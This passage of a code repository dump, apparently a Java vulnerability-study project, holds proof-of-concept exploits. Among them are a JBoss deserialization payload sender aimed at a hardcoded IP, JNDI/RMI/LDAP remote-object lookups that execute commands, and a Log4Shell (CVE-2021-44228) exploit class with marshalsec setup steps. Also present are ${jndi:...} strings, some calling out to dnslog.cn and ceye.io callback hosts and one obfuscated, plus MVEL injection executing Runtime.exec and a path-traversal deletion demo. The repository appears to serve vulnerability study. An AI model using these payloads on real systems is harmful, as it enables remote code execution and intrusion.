| } 38 | -------------------------------------------------------------------------------- /jboss/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jboss 13 | 14 | 15 | commons-collections 16 | commons-collections 17 | 3.1 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /jboss/src/main/java/com/jboss/main/Test.java: -------------------------------------------------------------------------------- 1 | package com.jboss.main; 2 | 3 | import java.io.File; 4 | import java.io.FileOutputStream; 5 | 6 | public class Test { 7 | public Test() { 8 | } 9 | 10 | public static void main(String[] args) { 11 | Payload payload = new Payload(); 12 | // String url = args[0]; 13 | String command = "echo test_for_jbossvul_12149"; 14 | String url = "http://192.168.116.132:8080"; 15 | try { 16 | byte[] win = payload.upload("windows"); 17 | byte[] lin = payload.upload("Linux"); 18 | doPost.DoPost(url, win); 19 | doPost.DoPost(url, lin); 20 | byte[] winpayload = payload.PayloadGeneration(command, "windows"); 21 | byte[] linpayload = payload.PayloadGeneration(command, "linux"); 22 | FileOutputStream linux = new FileOutputStream(new File("linux")); 23 | linux.write(linpayload); 24 | linux.close(); 25 | String result = doPost.DoPost(url, winpayload); 26 | String result2 = doPost.DoPost(url, linpayload); 27 | System.out.println(result + result2.trim()); 28 | } catch (Exception var9) { 29 | var9.printStackTrace(); 30 | } 31 | 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /jboss/target/classes/META-INF/jboss.kotlin_module: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/Payload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/Payload.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/Test.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/doPost.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/doPost.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$1.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$2.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main$3.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main$3.class -------------------------------------------------------------------------------- /jboss/target/classes/com/jboss/main/main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jboss/target/classes/com/jboss/main/main.class -------------------------------------------------------------------------------- /jenkins/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jenkins 13 | 14 | 15 | com.r17a 16 | weblogic 17 | 1.0-SNAPSHOT 18 | compile 19 | 20 | 21 | commons-collections 22 | commons-collections 23 | 3.2.2 24 | compile 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /jndi/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | jndi 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 7 20 | 7 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | com.unboundid 31 | unboundid-ldapsdk 32 | 3.1.1 33 | compile 34 | 35 | 36 | javassist 37 | javassist 38 | 3.12.1.GA 39 | compile 40 | 41 | 42 | javassist 43 | javassist 44 | 3.12.1.GA 45 | compile 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/JndiAndDns.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.NamingException; 5 | import javax.naming.directory.Attributes; 6 | import javax.naming.directory.DirContext; 7 | import javax.naming.directory.InitialDirContext; 8 | import java.util.Properties; 9 | 10 | public class JndiAndDns { 11 | public static void main(String[] args) { 12 | // 创建环境变量 13 | Properties env = new Properties(); 14 | // JNDI初始化工厂类 15 | env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); 16 | // JNDI提供服务的URL 17 | env.put(Context.PROVIDER_URL, "dns://8.8.8.8"); 18 | try { 19 | // 创建JNDI目录服务对象 20 | DirContext context = new InitialDirContext(env); 21 | 22 | // 获取DNS解析记录测试 23 | Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); 24 | Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); 25 | 26 | System.out.println(attrs1); 27 | System.out.println(attrs2); 28 | } catch (NamingException e) { 29 | e.printStackTrace(); 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/JndiAndLdap.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi; 2 | 3 | import com.r17a.jndi.ldap.CalcTest; 4 | 5 | import javax.naming.Context; 6 | import javax.naming.NamingException; 7 | import javax.naming.directory.DirContext; 8 | import javax.naming.directory.InitialDirContext; 9 | import java.io.IOException; 10 | import java.util.Hashtable; 11 | 12 | public class JndiAndLdap { 13 | public static void main(String[] args) throws NamingException, IOException { 14 | System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); 15 | Hashtable env = new Hashtable(); 16 | env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.ldap.LdapCtxFactory"); 17 | env.put(Context.PROVIDER_URL, "ldap://localhost:1389"); 18 | 19 | DirContext ctx = new InitialDirContext(env); 20 | 21 | CalcTest local_obj = (CalcTest) ctx.lookup("cn=foo,dc=example,dc=com"); 22 | System.out.println(local_obj.toString()); 23 | local_obj.calc(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/JndiAndRmi.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi; 2 | 3 | import com.r17a.jndi.rmi.Calc; 4 | import com.r17a.jndi.rmi.ICalc; 5 | 6 | import javax.naming.Context; 7 | import javax.naming.InitialContext; 8 | import javax.naming.NamingException; 9 | import java.io.IOException; 10 | import java.rmi.RemoteException; 11 | import java.util.Hashtable; 12 | 13 | public class JndiAndRmi { 14 | public static void main(String[] args) { 15 | try { 16 | test1(); 17 | } catch (Exception e) { 18 | e.printStackTrace(); 19 | } 20 | } 21 | 22 | public static void test1(){ 23 | String uri = "rmi://localhost:1099/calculate"; 24 | try { 25 | Context ctx = new InitialContext(); 26 | ICalc icalc = (ICalc) ctx.lookup(uri); 27 | icalc.calc(); 28 | } catch (NamingException e) { 29 | e.printStackTrace(); 30 | } catch (IOException e) { 31 | e.printStackTrace(); 32 | } 33 | } 34 | 35 | public static void test2() throws NamingException, RemoteException { 36 | Hashtable env = new Hashtable(); 37 | env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory"); 38 | env.put(Context.PROVIDER_URL,"rmi://127.0.0.1:1099"); 39 | Context ctx = new InitialContext(env); 40 | 41 | //将名称refObj与一个对象绑定,这里底层也是调用的rmi的registry去绑定 42 | ctx.bind("refObj", new Calc()); 43 | 44 | //通过名称查找对象 45 | ctx.lookup("refObj"); 46 | } 47 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/CalcTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import java.io.IOException; 4 | import java.io.Serializable; 5 | 6 | //public class CalcTest implements ObjectFactory { 7 | // 8 | // public CalcTest() throws IOException { 9 | // Runtime.getRuntime().exec("calc"); 10 | // } 11 | // 12 | // public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { 13 | // return new Integer(1); 14 | // } 15 | //} 16 | 17 | public class CalcTest implements Serializable { 18 | 19 | private static final long serialVersionUID = -3858195503738032307L; 20 | 21 | public CalcTest() throws IOException { 22 | Runtime.getRuntime().exec("calc"); 23 | } 24 | 25 | public void calc() throws IOException { 26 | Runtime.getRuntime().exec("calc"); 27 | } 28 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/LdapSerClient.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | import java.io.IOException; 7 | 8 | public class LdapSerClient { 9 | public static void main(String[] args) throws NamingException, IOException { 10 | System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); 11 | Context ctx = new InitialContext(); 12 | CalcTest object = (CalcTest) ctx.lookup("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com"); 13 | System.out.println(object.toString()); 14 | object.calc(); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/ldap/SerObject.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.ldap; 2 | 3 | import java.io.FileOutputStream; 4 | import java.io.IOException; 5 | import java.io.ObjectOutputStream; 6 | 7 | public class SerObject { 8 | public static void main(String[] args) throws IOException { 9 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("E:\\ser.txt")); 10 | CalcTest CalcTest = new CalcTest(); 11 | objectOutputStream.writeObject(CalcTest); 12 | } 13 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/Calc.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.RemoteException; 5 | import java.rmi.server.UnicastRemoteObject; 6 | 7 | /** 8 | * 服务器端实现远程接口。 9 | * 必须继承UnicastRemoteObject,以允许JVM创建远程的存根/代理。 10 | */ 11 | public class Calc extends UnicastRemoteObject implements ICalc { 12 | 13 | public Calc() throws RemoteException { 14 | } 15 | 16 | 17 | public void calc() throws IOException { 18 | Runtime.getRuntime().exec("calc"); 19 | } 20 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/ICalc.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.Remote; 5 | 6 | /** 7 | * 必须继承Remote接口。 8 | * 所有参数和返回类型必须序列化(因为要网络传输)。 9 | * 任意远程对象都必须实现此接口。 10 | * 只有远程接口中指定的方法可以被调用。 11 | */ 12 | public interface ICalc extends Remote { 13 | void calc() throws IOException; 14 | } -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/RmiClient.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.io.IOException; 4 | import java.rmi.NotBoundException; 5 | import java.rmi.RemoteException; 6 | import java.rmi.registry.LocateRegistry; 7 | import java.rmi.registry.Registry; 8 | 9 | 10 | public class RmiClient { 11 | public static void main(String[] args) { 12 | try { 13 | /***********方法1***************************/ 14 | // 如果RMI Registry就在本地机器上,URL就是:rmi://localhost:1099/hello 15 | // 否则,URL就是:rmi://RMIService_IP:1099/hello 16 | Registry registry = LocateRegistry.getRegistry("127.0.0.1",1999); 17 | // 从Registry中检索远程对象的存根/代理 18 | // 查找名为calculate的服务,这里必须是Icalc不能是Calc 19 | ICalc calculate = (ICalc) registry.lookup("calculate"); 20 | /***********方法2***************************/ 21 | // Icalc calculate = (Icalc) Naming.lookup("rmi://localhost:1999/calculate"); 22 | // 调用远程对象的方法 23 | calculate.calc(); 24 | } catch (RemoteException e) { 25 | e.printStackTrace(); 26 | } catch (NotBoundException e) { 27 | e.printStackTrace(); 28 | } catch (IOException e) { 29 | e.printStackTrace(); 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /jndi/src/main/java/com/r17a/jndi/rmi/RmiRegisterServer.java: -------------------------------------------------------------------------------- 1 | package com.r17a.jndi.rmi; 2 | 3 | import java.rmi.AlreadyBoundException; 4 | import java.rmi.RemoteException; 5 | import java.rmi.registry.LocateRegistry; 6 | import java.rmi.registry.Registry; 7 | 8 | /** 9 | * 注册远程对象,向客户端提供远程对象服务。 10 | * 远程对象是在远程服务上创建的,你无法确切地知道远程服务器上的对象的名称, 11 | * 但是,将远程对象注册到RMI Registry之后, 12 | * 客户端就可以通过RMI Registry请求到该远程服务对象的stub, 13 | * 利用stub代理就可以访问远程服务对象了。 14 | */ 15 | public class RmiRegisterServer{ 16 | private RmiRegisterServer(String port) throws RemoteException { 17 | Registry registry = LocateRegistry.createRegistry(Integer.parseInt(port)); 18 | try { 19 | registry.bind("calculate",new Calc()); 20 | } catch (AlreadyBoundException e) { 21 | e.printStackTrace(); 22 | } 23 | } 24 | 25 | public static void main(String[] args) { 26 | try { 27 | String port = "1099"; 28 | new RmiRegisterServer(port); 29 | System.out.println("RMI服务启动成功...\n"); 30 | System.out.println("Listening on localhost:"+ port +"..."); 31 | } catch (RemoteException e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | } -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndDns.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndDns.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndLdap.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndLdap.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/JndiAndRmi.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/JndiAndRmi.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/CalcTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/CalcTest.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer$OperationInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer$OperationInterceptor.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapRefServer.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerClient.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerClient.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer$OperationInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer$OperationInterceptor.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/LdapSerServer.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/ldap/SerObject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/ldap/SerObject.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/Calc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/Calc.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/ICalc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/ICalc.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/RmiClient.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/RmiClient.class -------------------------------------------------------------------------------- /jndi/target/classes/com/r17a/jndi/rmi/RmiRegisterServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/jndi/target/classes/com/r17a/jndi/rmi/RmiRegisterServer.class -------------------------------------------------------------------------------- /log4j/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | log4j 13 | 14 | 15 | 8 16 | 8 17 | 18 | 19 | 20 | 21 | org.apache.logging.log4j 22 | log4j-core 23 | 2.10.0 24 | 25 | 26 | 27 | org.apache.logging.log4j 28 | log4j-api 29 | 2.10.0 30 | 31 | 32 | log4j 33 | log4j 34 | 1.2.17 35 | compile 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /log4j/src/main/java/com/r17a/log4j2/cve_2021_44228/EXP.java: -------------------------------------------------------------------------------- 1 | package com.r17a.log4j2.cve_2021_44228; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.Name; 5 | import javax.naming.spi.ObjectFactory; 6 | import java.io.IOException; 7 | import java.util.Hashtable; 8 | 9 | // TODO 10 | // 1、javac EXP.java(记得先把`package com.r17a.log4j2;`删除) 11 | // 2、在上述文件目录下开启python3 -m http.server 12 | // 3、利用marshalsec工具开启ldap或rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#test 1389 13 | // 也可直接用JNDI_EXPLOIT工具ß 14 | public class EXP implements ObjectFactory { 15 | 16 | public EXP() throws IOException { 17 | Runtime.getRuntime().exec("open /System/Applications/Calculator.app"); 18 | Runtime.getRuntime().exec("ping *.ceye.io"); 19 | } 20 | 21 | // 实现ObjectFactory防止cast异常,return一个integer即可 22 | public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { 23 | return new Integer(1); 24 | } 25 | } 26 | 27 | 28 | -------------------------------------------------------------------------------- /log4j/src/main/java/com/r17a/log4j2/cve_2021_44228/RCE_20211209.java: -------------------------------------------------------------------------------- 1 | package com.r17a.log4j2.cve_2021_44228; 2 | 3 | 4 | import org.apache.log4j.PropertyConfigurator; 5 | import org.apache.logging.log4j.LogManager; 6 | import org.apache.logging.log4j.Logger; 7 | 8 | public class RCE_20211209 { 9 | public static final Logger LOGGER = LogManager.getLogger(RCE_20211209.class); 10 | public static void main(String[] args) { 11 | PropertyConfigurator.configure( "./log4j/src/main/resources/log4j.properties" ); 12 | System.out.println("test for log4j2"); 13 | LOGGER.error("${jndi:ldap://localhost:1389/cn=foo,dc=example,dc=com}"); 14 | // LOGGER.error("${jndi:ldap://localhost:1389/exp}"); 15 | // LOGGER.error("${jndi:ldap://127.0.0.1:1389/tpw9nj}"); 16 | // LOGGER.error("${jndi:rmi://pb8397.dnslog.cn/123}"); 17 | // LOGGER.error("${${lower:jndi}:${lower:rmi}://2.test.0ks3b9.ceye.io/poc} "); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /log4j/src/main/resources/log4j.properties: -------------------------------------------------------------------------------- 1 | ### 设置### 2 | log4j.rootLogger = debug,stdout,D,E 3 | 4 | ### 输出信息到控制抬 ### 5 | log4j.appender.stdout = org.apache.log4j.ConsoleAppender 6 | log4j.appender.stdout.Target = System.out 7 | log4j.appender.stdout.layout = org.apache.log4j.PatternLayout 8 | log4j.appender.stdout.layout.ConversionPattern = [%-5p] %d{yyyy-MM-dd HH:mm:ss,SSS} method:%l%n%m%n 9 | 10 | ### 输出DEBUG 级别以上的日志到=E://logs/error.log ### 11 | log4j.appender.D = org.apache.log4j.DailyRollingFileAppender 12 | log4j.appender.D.File = /Users/R17a/logs/log.log 13 | log4j.appender.D.Append = true 14 | log4j.appender.D.Threshold = DEBUG 15 | log4j.appender.D.layout = org.apache.log4j.PatternLayout 16 | log4j.appender.D.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n 17 | 18 | ### 输出ERROR 级别以上的日志到=E://logs/error.log ### 19 | log4j.appender.E = org.apache.log4j.DailyRollingFileAppender 20 | log4j.appender.E.File =/Users/R17a/logs/error.log 21 | log4j.appender.E.Append = true 22 | log4j.appender.E.Threshold = ERROR 23 | log4j.appender.E.layout = org.apache.log4j.PatternLayout 24 | log4j.appender.E.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n -------------------------------------------------------------------------------- /log4j/target/classes/com/r17a/log4j2/EXP.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/log4j/target/classes/com/r17a/log4j2/EXP.class -------------------------------------------------------------------------------- /log4j/target/classes/com/r17a/log4j2/RCE_20211209.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/log4j/target/classes/com/r17a/log4j2/RCE_20211209.class -------------------------------------------------------------------------------- /log4j/target/classes/log4j.properties: -------------------------------------------------------------------------------- 1 | ### 设置### 2 | log4j.rootLogger = debug,stdout,D,E 3 | 4 | ### 输出信息到控制抬 ### 5 | log4j.appender.stdout = org.apache.log4j.ConsoleAppender 6 | log4j.appender.stdout.Target = System.out 7 | log4j.appender.stdout.layout = org.apache.log4j.PatternLayout 8 | log4j.appender.stdout.layout.ConversionPattern = [%-5p] %d{yyyy-MM-dd HH:mm:ss,SSS} method:%l%n%m%n 9 | 10 | ### 输出DEBUG 级别以上的日志到=E://logs/error.log ### 11 | log4j.appender.D = org.apache.log4j.DailyRollingFileAppender 12 | log4j.appender.D.File = /Users/R17a/logs/log.log 13 | log4j.appender.D.Append = true 14 | log4j.appender.D.Threshold = DEBUG 15 | log4j.appender.D.layout = org.apache.log4j.PatternLayout 16 | log4j.appender.D.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n 17 | 18 | ### 输出ERROR 级别以上的日志到=E://logs/error.log ### 19 | log4j.appender.E = org.apache.log4j.DailyRollingFileAppender 20 | log4j.appender.E.File =/Users/R17a/logs/error.log 21 | log4j.appender.E.Append = true 22 | log4j.appender.E.Threshold = ERROR 23 | log4j.appender.E.layout = org.apache.log4j.PatternLayout 24 | log4j.appender.E.layout.ConversionPattern = %-d{yyyy-MM-dd HH:mm:ss} [ %t:%r ] - [ %p ] %m%n -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/cors/Cors.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.cors; 2 | 3 | import java.util.HashMap; 4 | 5 | public class Cors { 6 | /** 7 | * 漏洞模拟 8 | * https://portswigger.net/web-security/cors 9 | * */ 10 | public static void main(String[] args) { 11 | Cors response = new Cors(); 12 | // 漏洞 13 | response.setResponseHeader("Access-Control-Allow-Origin", "*"); 14 | response.setResponseHeader("Access-Control-Allow-Origin", null); 15 | // 白名单修复 16 | String[] authdomains = new String[]{"a.com.cn"}; 17 | response.setResponseHeader("Access-Control-Allow-Origin", authdomains); 18 | } 19 | 20 | public void setResponseHeader(String header, Object value) { 21 | HashMap headers = new HashMap(10); 22 | headers.put(header, value); 23 | } 24 | 25 | } 26 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/file/FileDelete.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.file; 2 | 3 | import java.io.File; 4 | 5 | public class FileDelete { 6 | public static void main(String[] args) { 7 | String fileName = "../../../../../../../../../../../../../../../../111.png"; 8 | FileDelete fileDelete = new FileDelete(); 9 | // fileDelete.fileDeleteNoFix(fileName); 10 | fileDelete.fileDeleteWithFix(fileName); 11 | } 12 | 13 | private Boolean fileDeleteNoFix(String fileName) { 14 | File file = new File("./owasp/src/main/resources/imgs", fileName); 15 | if (file.exists() && file.delete()) { 16 | System.out.println("Delete success!"); 17 | return true; 18 | } 19 | System.out.println("Delete fail!"); 20 | return false; 21 | } 22 | 23 | private boolean fileDeleteWithFix(String fileName) { 24 | File file = new File("./owasp/src/main/resources/imgs", fileName); 25 | // 获取最后一个"."所在位置 26 | int index = fileName.lastIndexOf("."); 27 | //如果使用 int index = fileName.indexOf("."); ,会获取第一个.的索引,可以用1.png.jsp绕过,修复失败 28 | String extension = fileName.substring(index); 29 | // 加白名单判断后缀 30 | String[] whiteList = {".png", ".jpg", ".jpeg", ".gif"}; 31 | for (String list : whiteList) { 32 | if (extension.toLowerCase().equals(list)) { 33 | if (file.exists() && file.delete()) { 34 | System.out.println("Delete success!"); 35 | return true; 36 | } 37 | System.out.println("Delete fail!"); 38 | return false; 39 | } 40 | } 41 | System.out.println("File extension is not allow!"); 42 | return false; 43 | 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/mvel/MvelTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.mvel; 2 | 3 | import org.junit.Test; 4 | import org.mvel2.MVEL; 5 | 6 | import java.io.Serializable; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | 10 | public class MvelTest { 11 | public static void main(String[] args) { 12 | new MvelTest().exp(); 13 | } 14 | 15 | public void exp(){ 16 | Map vars = new HashMap(); 17 | String expression1 = "Runtime.getRuntime().exec(\"calc\")"; 18 | Serializable serializable = MVEL.compileExpression(expression1); 19 | vars.put("1",expression1); 20 | MVEL.executeExpression(serializable,vars); 21 | 22 | String expression2 = "new java.lang.ProcessBuilder(new java.lang.String[]{\"calc\"}).start()"; 23 | vars.put("2",expression2); 24 | MVEL.eval(expression2,vars); 25 | } 26 | 27 | @Test 28 | public void test(){ 29 | // 两种方式 30 | String expression1 ="foobar > 99"; 31 | Serializable compiled = MVEL.compileExpression(expression1); 32 | Map vars = new HashMap(); 33 | vars.put("foobar",new Integer(100)); 34 | 35 | Boolean result1 = (Boolean)MVEL.eval(expression1, vars); 36 | if (result1.booleanValue()) { 37 | System.out.println("Itworks!"); 38 | } 39 | 40 | Boolean result2 = (Boolean)MVEL.executeExpression(compiled, vars); 41 | if (result2.booleanValue()) { 42 | System.out.println("Itworks2!"); 43 | } 44 | 45 | 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/School.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class School { 4 | String name; 5 | SchoolMaster schoolMaster; 6 | 7 | public School(){ 8 | 9 | } 10 | 11 | public School(String name, SchoolMaster schoolMaster) { 12 | this.name = name; 13 | this.schoolMaster = schoolMaster; 14 | } 15 | 16 | public String getName() { 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | this.name = name; 22 | } 23 | 24 | public SchoolMaster getSchoolMaster() { 25 | return schoolMaster; 26 | } 27 | 28 | public void setSchoolMaster(SchoolMaster schoolMaster) { 29 | this.schoolMaster = schoolMaster; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class SchoolMaster { 4 | String name; 5 | 6 | public SchoolMaster(){ 7 | 8 | } 9 | 10 | public SchoolMaster(String name) { 11 | this.name = name; 12 | } 13 | 14 | public String getName() { 15 | return name; 16 | } 17 | 18 | public void setName(String name) { 19 | this.name = name; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/Student.java: 